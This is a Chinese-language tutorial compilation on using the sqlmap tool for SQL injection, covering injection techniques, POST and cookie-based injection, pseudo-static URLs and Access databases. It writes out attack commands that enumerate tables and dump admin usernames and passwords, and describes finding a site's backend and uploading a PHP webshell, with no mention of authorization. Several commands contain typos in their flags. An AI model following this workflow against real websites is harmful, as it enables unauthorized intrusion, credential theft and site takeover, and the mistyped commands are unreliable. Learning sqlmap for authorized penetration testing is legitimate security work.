本文目录一览:
- 1、sqlmap怎么注入sql server
- 2、怎么用sqlmap测试登录注入
- 3、sqlmap 怎样用post注入
- 4、需要登录的网页 sqlmap怎么注入
- 5、伪静态sqlmap怎么注入的
- 6、sqlmap怎么注入ACCESS数据库
sqlmap怎么注入sql server
当给sqlmap这么一个url的时候,它会:
1、判断可注入的参数
2、判断可以用那种SQL注入技术来注入
3、识别出哪种数据库
4、根据用户选择,读取哪些数据
sqlmap支持五种不同的注入模式:
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4、联合查询注入,可以使用union的情况下的注入。
5、堆查询注入,可以同时执行多条语句的执行时的注入。
sqlmap支持的数据库有:
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB
可以提供一个简单的URL,Burp或WebScarab请求日志文件,文本文档中的完整http请求或者Google的搜索,匹配出结果页面,也可以自己定义一个正则来判断那个地址去测试。
测试GET参数,POST参数,HTTP Cookie参数,HTTP User-Agent头和HTTP Referer头来确认是否有SQL注入,它也可以指定用逗号分隔的列表的具体参数来测试。
怎么用sqlmap测试登录注入
严谨一点问题应该是:怎么用sqlmap测试Post注入,方法为:
第一种方式:./sqlmap.py -r post.txt(储存post数据的文本) -p 要注入的参数
第二种方式:sqlmap -u "url" --forms
第三种方式:sqlmap -u "url" --data "指定的参数"(如txt_UserName=aaatxt_Pwd=aaaa)
sqlmap 怎样用post注入
可以的,先用抓包工具(burp或者火狐插件)抓到post数据包,然后保存在本地txt文件里面。
然后执行以下命令即可。
sqlmap -r "c:\tools\request.txt" -p "username" --dbms mysql 指定username参数
需要登录的网页 sqlmap怎么注入
·对于需要登录的网站,我们需要指定其cookie 。我们可以用账号密码登录,然后用抓包工具抓取其cookie填入。
sqlmap -u "" --cookie="抓取的cookie" #探测该url是否存在漏洞
·对于是post提交数据的URL,我们需要指定其data参数
sqlmap -u "" --data="uname=adminpasswd=adminsubmit=Submit" #抓取其post提交的数据填入
我们也可以通过抓取 http 数据包保存为文件,然后指定该文件即可。这样,我们就可以不用指定其他参数,这对于需要登录的网站或者post提交数据的网站很方便。
我们抓取了一个post提交数据的数据包保存为post.txt,如下,uname参数和passwd参数存在SQL注入漏洞
伪静态sqlmap怎么注入的
伪静态sqlmap注入方法:
1、找到一个网站,做下安全检测,url是这样的:
不是传统的.php结尾,所以很多人认为这个不能注入,其实伪静态也能注入的,这个url虽然做了伪静态,但是还是需要传递参数到数据库去查询的,试试能否注入。于是提交
2、页面的信息出现变化:
页面出现了变化,通常来说是存在SQL注入的。注:因为+号会被url编码,所以我们通常使用减号来进行判断。
3、既然漏洞已经找到,接下来就很常规了,跑SQLMAP 语句:sqlmap.py -u *.html --dbms=mysql -v 3
参数说明:--dbsm指定数据库 -v 3 可以看到payload,不用使用代理抓包看sql注入语句了
4、确实存在漏洞,可以注入,下面已经把表给跑了出来了,然后找到后台,找上传点,直接上传php拿webshell。
sqlmap怎么注入ACCESS数据库
先来跑表,命令是sqlmap –u “url/NewsShow.asp?id=69” –tables
等到了这里,选择线程1到10开始扫表。也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表。
然后直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin。
然后得到了里面的字段username password id
然后直接跑字段内容sqlmap –u “url/NewsShow.asp?id=69” –dumps –T admin –C “username,password”
然后一路还是回车。到了
还是选择线程1到10,最后跑出了用户名、密码。